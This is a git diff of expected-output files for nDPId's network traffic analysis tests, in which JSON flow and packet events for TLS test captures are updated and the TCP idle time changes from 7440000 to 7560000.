+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1628259176203,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1628259176203,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAABAAABAAEAGtpPAqAHAwKgBFPa2AbvtIEkOAAAAALAC\/\/9MagAAAgQFtAEDAwUBAQgKE9Ij+wAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1628259176203,"pkt":"oM7IELEuAICPmq69CABFAAA8AABAAEAGtpfAqAEUwKgBwAG79rbEoc1F7SBJD6AScSBz9QAAAgQFtAQCCAoAseWtE9Ij+wEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAAA0AABAAEAGtp\/AqAHAwKgBFPa2AbvtIEkPxKHNRoAQEBUDzQAAAQEIChPSI\/sAseWt"} +01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1628259176203,"flow_last_seen":1628259176206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1628259176206,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":11,"total-skipped-flows":0,"total-l4-data-len":206,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1628259176206} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11/11 diff --git a/test/results/tls_certificate_too_long.pcap.out b/test/results/tls_certificate_too_long.pcap.out index 904d4b6ea..1b4ce350c 100644 --- a/test/results/tls_certificate_too_long.pcap.out +++ b/test/results/tls_certificate_too_long.pcap.out @@ -1,12 +1,12 @@ 00475{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1626168074745} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074745,"flow_last_seen":1626168074745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168074745,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1626168074745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074745,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoYkwAAEAGDJLAqAF5NJUVPM4KAbsrlJN\/t5VLK1AQEAACSAAA"} -00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074926,"flow_last_seen":1626168074926,"flow_idle_time":7440000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":394,"midstream":1,"thread_ts_msec":1626168074926,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1626168074926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168074926,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB\/6QAAAQEICj3R7oXM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074928,"pkt":"8BiYFWV8WNVuaKQACABFAAAohXJAAGYGg2s0lRU8wKgBeQG7zgq3lUsrK5STgFAQCAUKQgAA"} -01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1626168075218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168075218,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB+xwAAAQEICj3R76fM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1626168075586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168075586,"pkt":"8BiYFWV86qnehSPOCABFAAA0AABAAEAGtm\/AqAGLwKgBedhHzfFqV75MQuV5fYAQD\/PHGQAAAQEICszblug90e6F"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074745,"flow_last_seen":1626168074745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168074745,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1626168074745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074745,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoYkwAAEAGDJLAqAF5NJUVPM4KAbsrlJN\/t5VLK1AQEAACSAAA"} +00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074926,"flow_last_seen":1626168074926,"flow_idle_time":7560000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":394,"midstream":1,"thread_ts_msec":1626168074926,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1626168074926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168074926,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB\/6QAAAQEICj3R7oXM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1626168074928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074928,"pkt":"8BiYFWV8WNVuaKQACABFAAAohXJAAGYGg2s0lRU8wKgBeQG7zgq3lUsrK5STgFAQCAUKQgAA"} +01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1626168075218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168075218,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB+xwAAAQEICj3R76fM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1626168075586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168075586,"pkt":"8BiYFWV86qnehSPOCABFAAA0AABAAEAGtm\/AqAGLwKgBedhHzfFqV75MQuV5fYAQD\/PHGQAAAQEICszblug90e6F"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626168075664,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168075664,"pkt":"WNVuaKQA8BiYFWV8CABFAABI5dsAAEARwpjAqAF5CAgICMwbADUANLpX5f8BAAABAAAAAAAAAzEyMQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -44,21 +44,21 @@ 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1626168077441,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1626168077441,"pkt":"WNVuaKQA8BiYFWV8CABFAABlf9gAAEARKH\/AqAF5CAgICP\/UADUAUcNfVk0BAAABAAAAAAAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAQ=="} 00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077469,"flow_last_seen":1626168077469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077469,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1626168077469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077469,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KWAbtjvPcwAAAAALAC\/\/\/cwgAAAgQFtAEDAwYBAQgKPdH4ZwAAAAAEAgAA"} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077469,"flow_last_seen":1626168077469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077469,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1626168077469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077469,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KWAbtjvPcwAAAAALAC\/\/\/cwgAAAgQFtAEDAwYBAQgKPdH4ZwAAAAAEAgAA"} 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1626168077486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1626168077486,"pkt":"8BiYFWV8WNVuaKQACABFAADs3EYAAHkRkokICAgIwKgBeQA12Q8A2KuGXeWBgAABAAIAAQAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQABwAwABQABAAAN4AAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAAG0ANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTEtZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8B0AAYAAQAAADsAMwRwcmQxDmF6dXJlZG5zLWNsb3VkwEoGbXNuaHN0wBEAACcRAAADhAAAASwACTqAAAAAPA=="} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077506,"flow_last_seen":1626168077506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077506,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1626168077506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077506,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KXAbtENsV0AAAAALAC\/\/8t3wAAAgQFtAEDAwYBAQgKPdH4jAAAAAAEAgAA"} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077506,"flow_last_seen":1626168077506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077506,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 